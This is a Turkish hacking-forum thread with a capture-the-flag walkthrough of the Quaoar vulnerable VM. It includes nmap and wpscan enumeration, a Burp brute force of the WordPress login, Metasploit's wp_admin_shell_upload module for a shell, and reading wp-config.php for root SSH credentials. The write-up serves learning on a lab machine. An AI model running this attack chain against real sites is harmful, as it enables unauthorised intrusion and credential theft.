Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm




Quaoar :Açıklı Makine Çözümü /-The Hacker

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt bir Hafta önce   #1
  • Tuğgeneral
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 193
Teşekkür (Aldı): 825


Quaoar :Açıklı Makine Çözümü /-The Hacker





Merhaba Arkadaşlar Bu Konuda "Quaoar VM" Açıklı Makinesinin Nasıl Çözüldüğünü Anlatıcam. Ctf Alanında İlerlemek İstiyor İseniz Yada Daha Yeni Başladıysanız Bu Konu Tam Sizler İçin Çünkü Makine Açıklamasında Bile ;



Yazmakta Ki Bencede Öyle Bu Konunun Açılma Sebebi Temel Olarak Forumdaki Yeni Başlamış Hevesli Kitleye Hitap Etmek. CTF Hakkında Daha Detaylı Bilgiye Şu Rehber Konudan Ulaşabilirsiniz.

Bölümü Güncel Olarak Takip Ederek Kendinizi Geliştirebilirsiniz. Konuya Geçelim.

Kod:
Hedef ;  Bu makinede 3 tane bayrak vardır 1. Bir kabuk alın 2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var (Gugıl İle Çevirdim Çeviri Ne Kadar Doğru Bilemem.)

Şimdi İse Çözüme Geçelim.



İlk Olarak Hedef Makinemizim İp Adresini Bulmak İçin "netdiscover" Aracını Çalıştıralım.




Hedef İp Adresini Öğrendiğimize Göre Nmap Taraması Yaparak Açık Portları Görelim.


Kod:
nmap -A -T4 192.168.1.13


Nmap Tarama Sonuçlarını İncelediyseniz Eğer Dikkatinizi Benim Gibi Robots.txt Dosyası Çekmiştir. İncelemek Üzere Curl Aracını Çalıştırıyorum.


Kod:
curl 192.168.1.13/robots.txt


Beni "/wordpress" Uzantısına Yönlendiriyor Girdiğimde İse Hiçbirşey Bulamadım Buda Beni Otomatik Olarak "/wordpress/wp-login.php" Yönlendirdi .


Login Ekranında Pek Fazla Birşey Yapamayacağım İçin "wpscan" Aracını Kullanarak Sistemdeki Açıkları ve Username'leri Bulacağız.
Kullanacağım Komut ;


Kod:
wpscan --url http://192.168.1.13/wordpress/ --enumerate u

Sonuç Olarak Bana 2 Tane Username Verdi Bende Bunları Burpsuite Üzerindne Kaba Kuvvet Saldırısında Kullanıcam.
(Burpsuite İşin Tamamen Can Sıkıntısından Kullanıldı Ki Diğer Kolay Yollarlada Şifreyi Bulabilirsiniz. Misal Hydra İlede Deneyebilirsiniz. )





Kullandığım Wordlist İse ;
Username

Kod:
admin
wpuser
Password

Kod:
password
administrator
admin
wpuser
wordpress
wpadministrator



Bu Şekilde de Sitenin Admin Giriş Bilgilerini Kaba Kuvvet Saldırısı İle Bulduk.


Kod:
admin:admin
(Anlatım Zaten Forumda Olduğu İçin Yeniden Yazma Gereği Duymadım Şu Konuda Bulabilirsiniz;https://www.turkhackteam.org/siber-g...am_hacker.html )


Şimdi İse İlk Görevi Yapalım O Zaman. "1. Bir kabuk alın" Sisteme Shell Upload Edicez Kullanıcağımız Modül


Kod:
use exploit/unix/webapp/wp_admin_shell_upload
Gerekli Bilgileri Girelim.


Kod:
set PASSWORD admin
 set USERNAME admin
set RHOST 192.168.1.13
set TARGETURI /wordpress/
run


Meterpreter Shell'imizi Aldığımızı Göre Diğer Görevler Yani "2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var "
Bundan Sonra İse pwd ile hangi dizinde olduğumuzu öğrenip Bayrağımızı arıyoruz.




İlk Bayrağımızı Yakalamış Olduk. Kodlar;

Kod:
cd /home
cd wpadmin
ls
cat flag.txt
Sıra İkinci Bayrakta Bunun İçinde Artık /home Dizininden Çıkmak Gerekli


Kod:
cd /
Komutu ile çıkıp "ls" Komutu İle Bulunduğumuz Dizini Listeliyoruz. Dizinlerde Gezerken Yapılandırma Dosyasını Gördüm Ve Düşündüğüm Gibi;

Kod:
cd /var
ls
cd www
ls
cd wordpress
ls
cat wp-config.php
Ve Ssh Bağlantı Bilgilerimizide Almış Olduk.




Kod:
root
rootpassword!

Bağlantıyı Kurup .


Bayrağımızı Yakalayalım.
Tek Girmeniz Gereken Kod'lar


Kod:
ls 
more flag.txt
Ve 2.ci Bayrağımızıda Bulduk.




Konu Buraya Kadardı Ayrıca Bendende Buraya Kadardı 20 Saat Civarı Uyumuyordum Uykuyu Hakettiğimi Düşünüyorum Size İyi Okumalar Banada İyi Uykular



___________________________________________

Overdose



Konu THE HACKER 21 tarafından (bir Hafta önce Saat 17:49 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

TURKISH STARS, ATABÖRÜ, M3m0ry, LASN, Daedalus Teşekkür etti.
Alt bir Hafta önce   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
09/2018
Mesajlar
Konular

Teşekkür (Etti): 389
Teşekkür (Aldı): 194




Gerçekten uğraşılmış bir konu. İyi uykular hocam



___________________________________________

Bells are ringing
All through the drowned town
In the empty streets...
All through the drowned town...

 Offline  
 
Alıntı ile Cevapla
Alt bir Hafta önce   #3
  • Tuğgeneral
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 193
Teşekkür (Aldı): 825




Alıntı:
TURKISH STARS´isimli üyeden Alıntı Mesajı göster
Gerçekten uğraşılmış bir konu. İyi uykular hocam
Teşekkürler .



___________________________________________

Overdose


 Offline  
 
Alıntı ile Cevapla
Alt bir Hafta önce   #4
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2015
Mesajlar
Konular

Teşekkür (Etti): 42
Teşekkür (Aldı): 17




Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?



___________________________________________

if (dev.isBored() || job.sucks()) {
searchJobs({flexibleHours: True, companyCulture: 100});

}

 Offline  
 
Alıntı ile Cevapla
Alt bir Hafta önce   #5
  • Tuğgeneral
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 193
Teşekkür (Aldı): 825




Alıntı:
Daedalus´isimli üyeden Alıntı Mesajı göster
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
Elbette https://www.vulnhub.com/ Sitesinden Kendi Bilginizi Test Amaçlı ve Kendinizi Geliştirmek İçin Diğer Makinelere Ulaşabilirsiniz. Rehber Konuyuda Okuyarak Zafiyetli Makineler Hakkında Diğer Bilgilere Ve Paylaşılan Platformlara Bakabilirsin.
https://www.turkhackteam.org/capture...m-rehberi.html
İkinci Soru İçinde https://www.turkhackteam.org/capture-flag/ Bölümünü Güncel Olarak Takip Ederseniz Zaten Bu Gibi Konuların Geldiğini Ve Geleceğinide Görürsünüz
.



___________________________________________

Overdose


 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+

Sosyal Medya Bayilik Paneli
paykasa

wau